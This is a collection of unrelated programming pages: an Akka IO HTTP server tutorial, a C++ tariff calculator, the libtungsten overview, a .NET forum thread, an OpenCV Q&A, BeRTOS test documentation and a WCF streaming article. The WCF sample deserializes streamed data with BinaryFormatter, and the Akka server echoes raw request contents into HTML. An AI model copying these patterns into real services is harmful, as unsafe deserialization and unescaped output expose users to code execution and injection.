      (meth, (path, query), httpver) = requestLine
      headers ← readHeaders
      body ← readBody(headers)
    } yield Request(meth, path, query, httpver, headers, body)

In the above code readRequest takes the results of 3 different Iteratees (readRequestLine, readHeaders, readBody) and combines them into a single Request object. readRequestLine actually returns a tuple, so we extract its individual components. readBody depends on values contained within the header section, so we must pass those to the method.

The request line has 3 parts to it: the HTTP method, the requested URI, and the HTTP version. The parts are separated by a single space, and the entire request line ends with a CRLF.

def ascii(bytes: ByteString): String = bytes.decodeString("US-ASCII").trim

def readRequestLine =
  for {
    meth ← IO takeUntil SP
    uri ← readRequestURI
    _ ← IO takeUntil SP // ignore the rest
    httpver ← IO takeUntil CRLF
  } yield (ascii(meth), uri, ascii(httpver))

Reading the request method is simple as it is a single string ending in a space. The simple Iteratee that performs this is IO.takeUntil(delimiter: ByteString): Iteratee[ByteString]. It keeps consuming input until the specified delimiter is found. Reading the HTTP version is also a simple string that ends with a CRLF. The ascii method is a helper that takes a ByteString and parses it as a US-ASCII String.

Reading the request URI is a bit more complicated because we want to parse the individual components of the URI instead of just returning a simple string:

def readRequestURI = IO peek 1 flatMap {
  case PATH ⇒
    for {
      path ← readPath
      query ← readQuery
    } yield (path, query)
  case _ ⇒ sys.error("Not Implemented")
}

For this example we are only interested in handling absolute paths.
To detect whether the URI is an absolute path we use IO.peek(length: Int): Iteratee[ByteString], which returns a ByteString of the requested length but doesn't actually consume the input. We peek at the next bit of input and see if it matches our PATH constant (defined above as ByteString("/")). If it doesn't match we throw an error, but for a more robust solution we would want to handle other valid URIs.

Next we handle the path itself:

def readPath = {
  def step(segments: List[String]): IO.Iteratee[List[String]] = IO peek 1 flatMap {
    case PATH ⇒ IO drop 1 flatMap (_ ⇒ readUriPart(pathchar) flatMap (segment ⇒ step(segment :: segments)))
    case _ ⇒ segments match {
      case "" :: rest ⇒ IO Done rest.reverse
      case _          ⇒ IO Done segments.reverse
    }
  }
  step(Nil)
}

The step method is a recursive method that takes a List of the accumulated path segments. It first checks if the remaining input starts with the PATH constant; if it does, it drops that input and returns the readUriPart Iteratee, which has its result added to the path segment accumulator, and the step method is run again.

If after reading in a path segment the next input does not start with a path, we reverse the accumulated segments and return it (dropping the last segment if it is blank).

Following the path we read in the query (if it exists):

def readQuery: IO.Iteratee[Option[String]] = IO peek 1 flatMap {
  case QUERY ⇒ IO drop 1 flatMap (_ ⇒ readUriPart(querychar) map (Some(_)))
  case _     ⇒ IO Done None
}

It is much simpler than reading the path since we aren't doing any parsing of the query, as there is no standard format of the query string.
Both the path and query use the readUriPart Iteratee, which is next:

    val alpha = Set.empty ++ ('a' to 'z') ++ ('A' to 'Z') map (_.toByte)
    val digit = Set.empty ++ ('0' to '9') map (_.toByte)
    val hexdigit = digit ++ (Set.empty ++ ('a' to 'f') ++ ('A' to 'F') map (_.toByte))
    val subdelim = Set('!', '$', '&', '\'', '(', ')', '*', '+', ',', ';', '=') map (_.toByte)
    val pathchar = alpha ++ digit ++ subdelim ++ (Set(':', '@') map (_.toByte))
    val querychar = pathchar ++ (Set('/', '?') map (_.toByte))

    def readUriPart(allowed: Set[Byte]): IO.Iteratee[String] =
      for {
        str ← IO takeWhile allowed map ascii
        pchar ← IO peek 1 map (_ == PERCENT)
        all ← if (pchar) readPChar flatMap (ch ⇒ readUriPart(allowed) map (str + ch + _))
              else IO Done str
      } yield all

    def readPChar = IO take 3 map {
      case Seq('%', rest @ _*) if rest forall hexdigit ⇒
        java.lang.Integer.parseInt(rest map (_.toChar) mkString, 16).toChar
    }

Here we have several Sets that contain valid characters pulled from the URI spec. The readUriPart method takes a Set of valid characters (already mapped to Bytes) and will continue to match characters until it reaches one that is not part of the Set. If that character is a percent-encoded character, it is handled as valid and processing continues; otherwise we are done collecting this part of the URI.
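The decoding step readPChar performs, namely take 3 characters, expect '%' plus two hex digits, and parse the digits as a base-16 code point, can be sketched in Python as follows (the function name is ours, for illustration):

```python
HEXDIGITS = set("0123456789abcdefABCDEF")

def read_pchar(part):
    """Decode one percent-encoded character, e.g. '%20' -> ' '.

    Mirrors readPChar: exactly 3 characters, '%' followed by
    two hex digits, parsed as a base-16 code point.
    """
    if len(part) != 3 or part[0] != "%" or not set(part[1:]) <= HEXDIGITS:
        raise ValueError("not a percent-encoded character: %r" % (part,))
    return chr(int(part[1:], 16))
```

In the Scala version, a non-matching 3-byte sequence simply fails the pattern match; here we raise explicitly.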
Headers are next:

    def readHeaders = {
      def step(found: List[Header]): IO.Iteratee[List[Header]] = {
        IO peek 2 flatMap {
          case CRLF ⇒ IO takeUntil CRLF flatMap (_ ⇒ IO Done found)
          case _    ⇒ readHeader flatMap (header ⇒ step(header :: found))
        }
      }
      step(Nil)
    }

    def readHeader =
      for {
        name ← IO takeUntil COLON
        value ← IO takeUntil CRLF flatMap readMultiLineValue
      } yield Header(ascii(name), ascii(value))

    def readMultiLineValue(initial: ByteString): IO.Iteratee[ByteString] = IO peek 1 flatMap {
      case SP ⇒ IO takeUntil CRLF flatMap (bytes ⇒ readMultiLineValue(initial ++ bytes))
      case _  ⇒ IO Done initial
    }

And if applicable, we read in the message body:

    def readBody(headers: List[Header]) =
      if (headers.exists(header ⇒ header.name == "Content-Length" || header.name == "Transfer-Encoding"))
        IO.takeAll map (Some(_))
      else
        IO Done None

Finally we get to the actual Actor:

    class HttpServer(port: Int) extends Actor {

      val state = IO.IterateeRef.Map.async[IO.Handle]()(context.dispatcher)

      override def preStart {
        IOManager(context.system) listen new InetSocketAddress(port)
      }

      def receive = {
        case IO.NewClient(server) ⇒
          val socket = server.accept()
          state(socket) flatMap (_ ⇒ HttpServer.processRequest(socket))

        case IO.Read(socket, bytes) ⇒
          state(socket)(IO Chunk bytes)

        case IO.Closed(socket, cause) ⇒
          state(socket)(IO EOF)
          state -= socket
      }
    }

And its companion object:

    object HttpServer {
      import HttpIteratees._

      def processRequest(socket: IO.SocketHandle): IO.Iteratee[Unit] =
        IO repeat {
          for {
            request ← readRequest
          } yield {
            val rsp = request match {
              case Request("GET", "ping" :: Nil, _, _, headers, _) ⇒
                OKResponse(ByteString("<p>pong</p>"),
                  request.headers.exists { case Header(n, v) ⇒ n.toLowerCase == "connection" && v.toLowerCase == "keep-alive" })
              case req ⇒
                OKResponse(ByteString("<p>" + req.toString + "</p>"),
                  request.headers.exists { case Header(n, v) ⇒ n.toLowerCase == "connection" && v.toLowerCase == "keep-alive" })
            }
            socket write OKResponse.bytes(rsp).compact
            if (!rsp.keepAlive) socket.close()
          }
        }
    }

And the OKResponse:

    object OKResponse {
      import HttpConstants.CRLF

      val okStatus      = ByteString("HTTP/1.1 200 OK")
      val contentType   = ByteString("Content-Type: text/html; charset=utf-8")
      val cacheControl  = ByteString("Cache-Control: no-cache")
      val date          = ByteString("Date: ")
      val server        = ByteString("Server: Akka")
      val contentLength = ByteString("Content-Length: ")
      val connection    = ByteString("Connection: ")
      val keepAlive     = ByteString("Keep-Alive")
      val close         = ByteString("Close")

      def bytes(rsp: OKResponse) = {
        new ByteStringBuilder ++=
          okStatus ++= CRLF ++=
          contentType ++= CRLF ++=
          cacheControl ++= CRLF ++=
          date ++= ByteString(new java.util.Date().toString) ++= CRLF ++=
          server ++= CRLF ++=
          contentLength ++= ByteString(rsp.body.length.toString) ++= CRLF ++=
          connection ++= (if (rsp.keepAlive) keepAlive else close) ++= CRLF ++= CRLF ++= rsp.body result
      }
    }

    case class OKResponse(body: ByteString, keepAlive: Boolean)

A main method to start everything up:

    object Main extends App {
      val port = Option(System.getenv("PORT")) map (_.toInt) getOrElse 8080
      val system = ActorSystem()
      val server = system.actorOf(Props(new HttpServer(port)))
    }
http://doc.akka.io/docs/akka/2.1.0/scala/io.html
Computing an electricity bill involves calculating the number of units consumed and allocating them to a variety of tariffs. Tariffs are based on two components: a standing charge and a price per unit. There may be more than one price range; perhaps the first 50 units are charged at a higher rate than subsequent units.

Given that the initial tariffs offered are (as used in the code below):

Tariff A: 10.00 standing charge; the first 80 units at 0.105 per unit, subsequent units at 0.03.
Tariff B: 3.00 standing charge; the first 250 units at 0.10 per unit, subsequent units at 0.075.
Tariff C: no standing charge; all units at 0.125.

Customers must choose the tariff they wish to be charged under. Design a program that accepts the number of units consumed and reports the most economic tariff.

C++.

    #include <cstdio>
    #include <cstdlib>

    using namespace std;

    // iUnits        = the total number of units consumed
    // fStart        = the standing charge
    // fSwitch       = the number of units after which the lower rate applies
    // fStandardRate = the higher rate that applies to the first units
    // fLowRate      = the lower rate that applies to subsequent units
    float ic_CalculateCost(int iUnits, float fStart, float fSwitch,
                           float fStandardRate, float fLowRate = 0)
    {
        // stores the total
        float fCost = fStart;

        // work out the price for this tariff:
        // see if they used enough units to reach both brackets
        if (fSwitch && iUnits > fSwitch)
        {
            // the first units are at the standard rate
            fCost += fSwitch * fStandardRate;
            // remaining units are at the low rate
            fCost += (iUnits - fSwitch) * fLowRate;
        }
        else
        {
            // all units at the standard rate
            fCost += iUnits * fStandardRate;
        }

        // return the total price
        return fCost;
    }

    int main(int argc, char *argv[])
    {
        if (argc < 2)
            return 1;

        // convert the units to a number and store
        int iUnits = atoi(argv[1]);

        // this stores the prices for each tariff
        float fPrices[3];

        // work out the price for tariff a
        fPrices[0] = ic_CalculateCost(iUnits, 10, 80, 0.105, 0.03);
        // work out the price for tariff b
        fPrices[1] = ic_CalculateCost(iUnits, 3, 250, 0.1, 0.075);
        // work out the price for tariff c
        fPrices[2] = ic_CalculateCost(iUnits, 0, 0, 0.125);

        // show all the total prices (character 156 is the pound sign
        // in the OEM console code page)
        printf("Tariff A: %c%.2f\nTariff B: %c%.2f\nTariff C: %c%.2f\n",
               156, fPrices[0], 156, fPrices[1], 156, fPrices[2]);
        return 0;
    }

Excel
formulas.

    Tariff A: =IF(A1 > 80, 10 + (80 * 0.105) + ((A1 - 80) * 0.03), 10 + (A1 * 0.105))
    Tariff B: =IF(A1 > 250, 3 + (250 * 0.1) + ((A1 - 250) * 0.075), 3 + (A1 * 0.1))
    Tariff C: =A1*0.125

The formulas above were then used to construct a chart of cost against units consumed, which shows: Tariff C is the best choice for fewer than 120 units. Tariff B is the best choice for 120 to 190 units. Tariff A is the best choice for more than 190 units.
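Those breakeven figures can be double-checked with a quick script. Here is the same calculation in Python, mirroring ic_CalculateCost and the three tariffs above (function names are ours):

```python
def cost(units, standing, switch, standard_rate, low_rate=0.0):
    """Total price: standing charge plus per-unit charges, with
    units beyond `switch` billed at the lower rate."""
    if switch and units > switch:
        return standing + switch * standard_rate + (units - switch) * low_rate
    return standing + units * standard_rate

def cheapest(units):
    """Name of the most economic tariff for the given consumption."""
    prices = {
        "A": cost(units, 10, 80, 0.105, 0.03),
        "B": cost(units, 3, 250, 0.1, 0.075),
        "C": cost(units, 0, 0, 0.125),
    }
    return min(prices, key=prices.get)
```

Solving the equations exactly, the C/B crossover is at 120 units and the B/A crossover at about 186 units, which the chart reads as roughly 190.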
http://iceyboard.no-ip.org/projects/littleredbook/4/6
libtungsten is a simple and open-source library designed to help you program ARM Cortex microcontrollers. Let's talk about some key aspects: Open source is more than just a license, it's a mindset. Unlike some other popular libraries, the code of libtungsten isn't hidden deep inside the OS, trying to keep beginners and hackers from seeing it: instead, it is available right there in your project folder, inviting you to see how it works and to customize it to fit your needs. Microcontroller programming can sometimes look a bit like dark magic to beginners in the way software is able to interact with hardware. « What's inside this digitalWrite() function that allows it to act on my electrical circuit and light up this LED? » is the kind of question most programmers ask themselves at least once. libtungsten provides easily accessible and well-documented code that you can simply go read if you want to learn more. The documentation also features in-depth tutorials explaining the internal workings of the microcontroller as well as how to read the datasheets. All these resources are here so you can truly learn how things work. Keeping a copy of the library inside each project also means that it can be customized for each application. Found the perfect sensor for your project but it requires unusual I2C settings? Not a problem, just open the i2c.cpp driver and customize it to fit your needs. Want to control a strip of WS2812 RGB LEDs without wasting tons of CPU cycles? Write a custom driver based on spi.cpp to use the SPI controller and the DMA. Need to use the SysTick system timer for an advanced application-specific purpose? Just open core.cpp and customize it at will. To get you started, the documentation of each module contains a Hacking section giving tips and ideas about what can be customized. By the way, if you cloned the library from the Git repository and you want to update it, don't worry, Git will be able to merge your changes into the new version.
In order to keep things simple, libtungsten does not try to be generic and portable across lots of microcontrollers; instead, it is dedicated to the ATSAM4L line of microcontrollers from Atmel/Microchip. These microcontrollers come in a range of sizes (48, 64 and 100 pins), packages (TQFP, VFBGA, WLCSP and QFN), and memory densities (32KB RAM / 128KB Flash, 32KB RAM / 256KB Flash and 64KB RAM / 512KB Flash). They are based on the Cortex-M4 architecture, can run up to 48MHz, have a lot of optimizations for low-power design, and come with loads of interesting peripherals, such as: Obviously, in order to program a microcontroller, a library is not enough: you need a board equipped with the microcontroller in question. You have basically three options, from easiest to hardest: libtungsten is released under the permissive Apache 2.0 license, which basically means that you can use the library freely for personal and commercial use. More information about this on the official page, or on TLDRLegal for a more digestible version. libtungsten adopts the Unix philosophy stating that a tool should do only one thing, but do it well. In that perspective, it doesn't offer an IDE but instead invites you to use the text editor of your choice, whether it is console-based (vim, emacs... in no particular order) or GUI-based (Sublime Text, ...). Compiling and flashing code is done using a simple Makefile and OpenOCD (by default, you can use something else if you prefer). The library aims to be as light, simple and straightforward as possible: each module lives in its own namespace, and functions are accessed with the standard scope resolution operator: Module::function(). Most of the microcontroller's peripherals offer powerful but complex features which can be optimized in very specific situations. To keep things simple, the library doesn't try to accommodate every possible case; instead, you are free to customize the modules to fit your needs.
https://libtungsten.io/overview
RE: CLR 1.1 SP1 destroys System.Management code From: Manfred Braun (ManfredBraun_at_discussions.microsoft.com) Date: 10/13/04 - ] Date: Wed, 13 Oct 2004 10:49:08 -0700 Hello Blair, after I discovered [see my other response], that this is clearly a CLR problem, what type of ongoing can I expect? I have to ensure, that my application continues working even with SP1. Would be nice to hear more infos. Thanks so far and best regards, Manfred "Blair Neumann [MSFT]" wrote: > Hello Manfred. > > Sorry to hear about your problems running System.Management code on NDP 1.1 > SP1! Unfortunately, I cannot assist you in debugging your application. > However you also asked how to remove NDP 1.1 SP1 which is something that I > may be able to help you with. As you observe, it's not as simple as > Add/Remove Programs. > > Note that what you call CLR 1.1, I call NDP 1.1. I believe we are talking > about the same thing: the .NET Framework 1.1 and its associated Service > Pack 1. > > Assuming you are running on a platform other than Windows Server 2003, NDP > 1.1 SP1 will not show up in Add/Remove Programs. (If you are running on > 32-bit versions of Windows Server 2003 then NDP 1.1 SP1 should be in > Add/Remove Programs as "KB867460". You can simply uninstall it there.) > Instead, you can revert to pre-SP1 levels by uninstalling the .NET > Framework from Add/Remove Programs and then re-installing the .NET > Framework. Unfortunately, we do not support the explicit uninstall of .NET > Framework service packs except on specific platforms such as Windows Server > 2003 (these platforms contain the .NET Framework as pre-installed Windows > components); you must uninstall the .NET Framework itself, then re-install > it without re-installing the Service Pack. In this case, you would simply > uninstall and then re-install the .NET Framework 1.1. 
> > You can get the .NET Framework 1.1 from this URL: >- > 8157-034d1e7cf3a3&displaylang=en > > Note that you must also re-install any hotfixes that you may have had after > re-installing the .NET Framework. Many customers do not have any .NET > Framework hotfixes installed, but if you do then you will need to replace > them. Unlike service packs, .NET Framework hotfixes do show up in > Add/Remove programs, so you can see which NDP 1.1 hotfixes you have > installed by checking Add/Remove Programs prior to uninstalling .NET > Framework 1.1. .NET Framework hotfix entries in Add/Remove Programs > typically look like this: "Microsoft .NET Framework 1.1 Hotfix (KBxxxxxx)". > If you do not still have the hotfix executable for re-install, you should > be able to get it again from the same source who provided it for you the > first time: for example, from your OEM or from the Microsoft Download > Center (). > > I hope this helps! > > Best wishes. > -Blair. > > -------------------- > > Subject: CLR 1.1 SP1 destroys System.Management code > > Date: Sat, 9 Oct 2004 07:03:05 -0700 > > > > Hi All, > > after I installed the SP1 on CLR1.1, my code using System.Management is > no > > longer working. 
My code worked the whole time until SP1 and is as follows: > > > > //mewSP1Test1.cs > > > > using System; > > using System.Management; > > > > public class Test > > { > > > > public static void Main() > > { > > ManagementEventWatcher mew; > > ConnectionOptions co; > > ManagementPath mp; > > ManagementScope ms; > > WqlEventQuery weq; > > > > co = new ConnectionOptions(); > > co.EnablePrivileges = true; > > > > co.Impersonation = ImpersonationLevel.Impersonate; > > co.Authentication = AuthenticationLevel.Connect; > > > > mp = new ManagementPath(); > > mp.NamespacePath = @"\root\cimv2"; > > mp.Server = "m1"; > > > > ms = new ManagementScope(mp, co); > > > > weq = new WqlEventQuery("select * from __InstanceCreationEvent where > > (TargetInstance isa 'Win32_NTLogEvent') and (TargetInstance.Logfile <> > > 'Security')"); > > > > mew = new ManagementEventWatcher(ms, weq); > > mew.EventArrived += new > EventArrivedEventHandler(OnEventlogEventArrived); > > mew.Start(); > > Console.WriteLine("Waiting for events...."); > > Console.ReadLine(); > > } > > > > private static void OnEventlogEventArrived(object sender, > > EventArrivedEventArgs e) > > { > > //This is the eventhandler for the returned WMI results. > > > > string msg; > > > > > > //Get the wmi-event > > > > ManagementBaseObject mbo; > > mbo = (ManagementBaseObject)e.NewEvent["TargetInstance"]; > > > > try > > { > > msg = ((string) mbo["Message"]).Trim(); > > Console.WriteLine(msg); > > } > > catch(Exception ex) > > { > > Console.WriteLine("Exception:{0}", ex.ToString()); > > } > > > > Console.WriteLine(new String('-', 79)); > > } > > > > } > > > > How to fix the bug? > > How to uninstall SP1, it is not listed under software! > > > > Any help would be wonderful! > > Thanks and best regards, > > Manfred Bra ]
http://www.tech-archive.net/Archive/DotNet/microsoft.public.dotnet.framework.setup/2004-10/0102.html
Difference between thresholding functions

Hi guys, I have two sets of code for thresholding.

Code 1

    import cv2
    import numpy as np

    Image = cv2.imread('blue.jpg')
    Threshold = np.zeros(Image.shape, np.uint8)
    cv2.threshold(Image, 121, 255, cv2.THRESH_BINARY, Threshold)
    cv2.imshow("WindowName", Threshold)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

and Code 2

    import cv2
    import numpy as np

    Image = cv2.imread('blue.jpg')
    ret, thresh = cv2.threshold(Image, 121, 255, cv2.THRESH_BINARY)
    cv2.imshow("WindowName", thresh)
    cv2.waitKey(0)
    cv2.destroyAllWindows()

What is the difference between these two threshold calls?

There shouldn't be a difference in the resulting image. You have two possible ways to call the function in Python: pass a preallocated destination array, or use the returned one. Do you see any differences?

The output image shows no difference, but there is a small change in syntax.
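To see why the two call styles agree, it helps to look at what THRESH_BINARY actually computes: dst(x) = maxval if src(x) > thresh, else 0. A dependency-free Python sketch of that rule on a single row of pixels (plain lists instead of cv2/numpy, names ours):

```python
def thresh_binary(pixels, thresh, maxval):
    """THRESH_BINARY rule: maxval where the pixel exceeds thresh, else 0."""
    return [maxval if p > thresh else 0 for p in pixels]

row = [50, 121, 122, 200]

# "Code 1" style: fill a preallocated destination.
dst = [0] * len(row)
dst[:] = thresh_binary(row, 121, 255)

# "Code 2" style: use the returned value.
ret = thresh_binary(row, 121, 255)
```

Whether you preallocate the destination or take the return value, the per-pixel rule is identical, so the two images match. Note that a pixel exactly equal to the threshold (121 here) maps to 0, since the test is strictly greater-than.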
http://answers.opencv.org/question/87743/difference-between-thresholding-function/
test.h File Reference

Utility for the test suite.

    #include "cfg/cfg_arch.h"

Go to the source code of this file.

Detailed Description

Utility for the test suite.

When you want to test a module that is emulable on hosted platforms, these macros come in handy. Your module_test should supply three basic functions:

    int module_testSetup(void)
    int module_testRun(void)
    int module_testTearDown(void)

All of these should return 0 if ok, or a value != 0 on errors. Then, at the end of your module_test you can write:

    #if UNIT_TEST
    #include <whatuneed.h>
    #include <whatuneed.c>
    #include <...>
    TEST_MAIN(module);
    #endif

Including the .c files you need directly into your module_test allows you to build and run the test by compiling only one file. To achieve this you also need a main(), which is supplied by the TEST_MAIN macro. This will expand to a full main that calls, in sequence, the Setup, Run and TearDown functions of your module.

Definition in file test.h.

Define Documentation

Silence an assert in a test. This is useful when we run a test and we want to exercise an error condition. We know that an assert will fail, but this is not really an error. To ignore it we mark it with this macro, where str is the message string of the assert that we want to drop. To use this macro, copy the assert log message and paste it as the argument of this macro. The assert log message also reports the line number of the code that generated the assert, so you can trap only the selected assert message.

Definition at line 116 of file test.h.
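For illustration, here is what a minimal module_test can look like in C, with a hand-written runner standing in for what TEST_MAIN(module) generates. The function bodies are dummies; only the three-function convention comes from test.h:

```c
static int counter;

/* The three functions the test suite expects; each returns 0 on success. */
int module_testSetup(void)    { counter = 0; return 0; }
int module_testRun(void)      { counter++; return (counter == 1) ? 0 : 1; }
int module_testTearDown(void) { counter = 0; return 0; }

/* Conceptually what TEST_MAIN(module) expands to: call Setup, Run and
 * TearDown in sequence and report the first nonzero result. */
int module_testMain(void)
{
    int err;
    if ((err = module_testSetup()) != 0)
        return err;
    if ((err = module_testRun()) != 0)
        return err;
    return module_testTearDown();
}
```

The real macro also takes care of platform setup; this sketch only shows the call order and the zero-on-success contract.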
http://doc.bertos.org/2.5/test_8h.html
Complete source code is available at code.msdn.microsoft.com

Many distributed business applications work with a huge number of database rows, transferring large record sets to multiple processes running on different machines. Most likely these large datasets are generated using complex, long-running database queries. To improve data transfer performance for these types of business applications, we can use custom WCF streaming.

Here is a sample that shows how to implement custom WCF streaming. This sample code streams database records to the client. The basic idea: we will have two threads; one thread will execute the complex database query, and another thread will stream database rows to the clients. We alter the database query so that it returns only 1000 rows at a time, and modify the WCF service to stream those 1000 rows to the client. While the WCF service is streaming database rows to the client, at the same time on a different thread, the WCF service runs the database query again to get the next 1000 rows. This way, as soon as the WCF service finishes streaming rows to the client, the next set of rows is available to stream to the client.

1. WCF client calling WCF service
2. WCF service executing database query
3. Database returns dataset to WCF service
4. WCF service response
5. Second database query executed by WCF service
6. WCF stream response

Let's start with the WCF service contract:

    [ServiceContract]
    public interface IStockMarket
    {
        [OperationContract]
        Stream GetDBRowStream();
    }

Here we have one WCF operation which returns a Stream object. Next, let's review the service contract implementation:

    public class StockMarket : IStockMarket
    {
        public Stream GetDBRowStream()
        {
            return new DBRowStream();
        }
    }

The WCF service creates a new custom Stream object and returns it to the client.
Next, let's review the client code:

    try
    {
        Stream s = proxy.GetDBRowStream();
        IFormatter formatter = new BinaryFormatter();
        OrderModel m;
        while (s.CanRead)
        {
            m = formatter.Deserialize(s) as OrderModel;
            Console.Write(string.Format("order ID is {0}\r\n", m.ID));
        }
    }
    catch (System.Exception ex)
    {
        Console.WriteLine(ex.Message);
    }

The client calls GetDBRowStream() on the WCF proxy object and continuously reads the stream object until it returns false for CanRead. Here, we are reading the content from the stream object. Using the BinaryFormatter we deserialize it into a usable .NET object of type OrderModel.

Let's review the OrderModel class:

    [Serializable]
    public class OrderModel
    {
        public int ID;
        public int ParameterOne;
        public int ParameterTwo;
        public int ParameterThree;
        public int Results;
    }

OrderModel is nothing but a database row, so in the client code we are reading one database row at a time.

Now let's look at the DBRowStream class source code:

    public class DBRowStream : Stream
    {
        bool bCanRead = true;
        MemoryStream memStream1 = new MemoryStream();
        MemoryStream memStream2 = new MemoryStream();
        IFormatter formatter = new BinaryFormatter();
        .....
        .....

Note: this code is a little complex, as it is returning the stream object to the client and at the same time executing the SQL query to get the next dataset.

This class has two memory stream objects so that it can write to the first memory stream while reading data from the database, and read from the second memory stream while streaming data to the WCF client. In the image below, "a" and "b" are the two memory stream objects. At the beginning we write to memory stream "a" while reading data from the database. Next, at step 4, we read data from memory stream "a" and write it to the WCF client.
At the same time, on another thread (step 5), we make another database query to get the next set and write it to memory stream "b".

Now let's look at how this class fills these two memory stream objects: after writing the first 10 database rows to memory stream "a", it will write the next 10 database rows to memory stream "b". While writing to "b", it will read data from "a" and send it to the client. A BinaryFormatter is used to serialize each database row.

    void DBThreadProc(object o)
    {
        SqlConnection con = null;
        SqlCommand com = null;
        try
        {
            con = new System.Data.SqlClient.SqlConnection("Server=.\\SQLEXPRESS;Initial Catalog=OrderDB;Integrated Security=SSPI");
            com = new SqlCommand();
            com.Connection = con;
            com.CommandText = "Select top 1000 * from Orders ";
            con.Open();
            SqlDataReader sdr = com.ExecuteReader();
            int count = 0;
            MemoryStream memStream = memStream1;
            memStreamWriteStatus = 1;
            readyToWriteToMemStream1.WaitOne();
            while (sdr.Read())
            {
                OrderModel model = new OrderModel();
                model.ID = sdr.GetInt32(0);
                model.ParameterOne = sdr.GetInt32(1);
                model.ParameterTwo = sdr.GetInt32(2);
                model.ParameterThree = sdr.GetInt32(3);
                formatter.Serialize(memStream, model);
                count++;
                if (count > 10)
                {
                    switch (memStreamWriteStatus)
                    {
                        case 1: // done writing to 1
                        {
                            memStream1.Position = 0;
                            readyToSendFromMemStream1.Set();
                            Console.Write("write 1 is done...waiting for 2\r\n");
                            readyToWriteToMemStream2.WaitOne();
                            Console.Write("done waiting for 2\r\n");
                            memStream = memStream2;
                            memStream.Position = 0;
                            memStreamWriteStatus = 2;
                            break;
                        }
                        case 2: // done writing to 2
                        {
                            memStream2.Position = 0;
                            readyToSendFromMemStream2.Set();
                            Console.Write("write 2 is done...waiting for 1\r\n");
                            readyToWriteToMemStream1.WaitOne();
                            Console.Write("done waiting for 1\r\n");
                            memStream = memStream1;
                            memStreamWriteStatus = 1;
                            memStream.Position = 0;
                            break;
                        }
                    }
                    count = 0;
                }
            }
            bCanRead = false;
        }
        catch (System.Exception excep)
        {
        }
    }

Now let's see how this class streams database rows to the WCF client.
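Stripped of the WCF and SQL details, the ping-pong between the two memory streams is a classic double-buffer handoff: two buffers, each with a "ready to write" and a "ready to read" signal. A small Python sketch of the same pattern, for illustration only (all names are ours):

```python
import threading

def stream_rows(chunks):
    """Produce `chunks` on one thread and consume them on another,
    ping-ponging between two buffers like memory streams 'a' and 'b'."""
    buffers = [None, None]
    readable = [threading.Event(), threading.Event()]  # "ready to send"
    writable = [threading.Event(), threading.Event()]  # "ready to write"
    for ev in writable:
        ev.set()                    # both buffers start out writable

    def producer():
        for i, chunk in enumerate(chunks):
            b = i % 2               # alternate between the two buffers
            writable[b].wait()      # wait until the reader has drained it
            writable[b].clear()
            buffers[b] = list(chunk)
            readable[b].set()       # hand the buffer over to the reader

    t = threading.Thread(target=producer)
    t.start()

    out = []
    for i in range(len(chunks)):    # the reader drains in the same order
        b = i % 2
        readable[b].wait()
        readable[b].clear()
        out.extend(buffers[b])
        writable[b].set()           # give the buffer back to the producer
    t.join()
    return out
```

The C# version below implements the same handoff with AutoResetEvents, except the consumer side is driven by the WCF framework calling Read() rather than by a loop of its own.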
This class overrides the Read() function. Read() is called by the WCF framework to stream the data to the client. When Read() is called, it first checks whether there is any data left in the current memory stream object. If so, it reads from the memory stream, streams it to the client and returns. When Read() is called again, it checks which memory stream object, "a" or "b", is available for reading, then reads data from that memory stream and sends it to the client. After reading a memory stream object, it marks it as "available for write"; the database function above will then write to it. Once writing to a memory stream object is completed, it is marked "available for read", and the stream read function below will read from it.

    MemoryStream memStream = null;

    public override int Read(byte[] buffer, int offset, int count)
    {
        if (memStream != null)
        {
            if (memStream.Position != memStream.Length)
            {
                return memStream.Read(buffer, offset, count);
            }
            else
            {
                switch (memStreamReadStatus)
                {
                    case 0:
                    {
                        throw new Exception();
                    }
                    case 1:
                    {
                        Console.Write("READ : done sending from 1\r\n");
                        readyToWriteToMemStream1.Set();
                        break;
                    }
                    case 2:
                    {
                        Console.Write("READ : done sending from 2\r\n");
                        readyToWriteToMemStream2.Set();
                        break;
                    }
                }
            }
        }
        switch (memStreamReadStatus)
        {
            case 0:
            {
                Console.Write("READ : waiting for 1\r\n");
                while (!readyToSendFromMemStream1.WaitOne(1000))
                {
                    if (!bCanRead)
                    {
                        buffer[offset] = 0;
                        return 0;
                    }
                }
                Console.Write("READ : done waiting for 1\r\n");
                memStream = memStream1;
                memStreamReadStatus = 1;
                break;
            }
            case 1:
            {
                Console.Write("READ : waiting for 2\r\n");
                while (!readyToSendFromMemStream2.WaitOne(1000))
                {
                    if (!bCanRead)
                    {
                        buffer[offset] = 0;
                        return 0;
                    }
                }
                Console.Write("READ : done waiting for 2\r\n");
                memStream = memStream2;
                memStreamReadStatus = 2;
                break;
            }
            case 2:
            {
                Console.Write("READ : waiting for 1\r\n");
                while (!readyToSendFromMemStream1.WaitOne(1000))
                {
                    if (!bCanRead)
                    {
                        buffer[offset] = 0;
                        return 0;
                    }
                }
                Console.Write("READ : done waiting for 1\r\n");
                memStream = memStream1;
                memStreamReadStatus = 1;
                break;
            }
        }
        return memStream.Read(buffer, offset, count);
    }

Where is the end? Remember the client code: the client reads from the stream object until the CanRead property returns false. At the server side, we set this value in the property below:

    public override bool CanRead
    {
        get { return bCanRead; }
    }

Complete Source Code

Complete source code is available at code.msdn.microsoft.com

Really interesting article. Out of curiosity, each time I run it I get an error on the last element or two stating that the end of the stream was encountered before parsing was complete. I thought I possibly just needed to reposition the stream to the first element, but I'm still receiving the error. Any ideas? Great article! Ryan

Sorry for the delay. Thank you for downloading the sample. I just fixed the bug and uploaded it to the code.msdn.microsoft.com site. Due to this bug, it was not pushing the last set of records to the client.

No problem at all on the delay. I actually found that same issue of missing the last record when writing to the stream and fixed it as well. I've noticed that your code and mine still end up with an exception after the last row. It effectively never recognizes the change to the stream.CanRead property, tries to read another set of bytes, comes up with none, and my serializer throws an exception. For a test I simply set CanRead to false about halfway through my dataset, and the client never sees the property changing. Any ideas why the client would never recognize the property CanRead as being false? By the way, I implemented this with a WPF-based application we have, using a dispatcher and background worker to keep the form responsive, and it works really, really well.
I nearly have everything working, but I run into this odd deserialization error every time I run it, and I'm wondering if you've seen it. I basically make it, say, 100 rows through a 1000-row stream and it throws this consistently:

    The input stream is not a valid binary format. The starting contents (in bytes) are: 65-6E-74-69-76-65-20-4D-61-69-6E-74-65-6E-61-6E-63 …"} System.Exception {System.Runtime.Serialization.SerializationException}

Do I need to enable a special encoding before I write and read from the stream, or something similar to that? Any help would be appreciated, Ryan

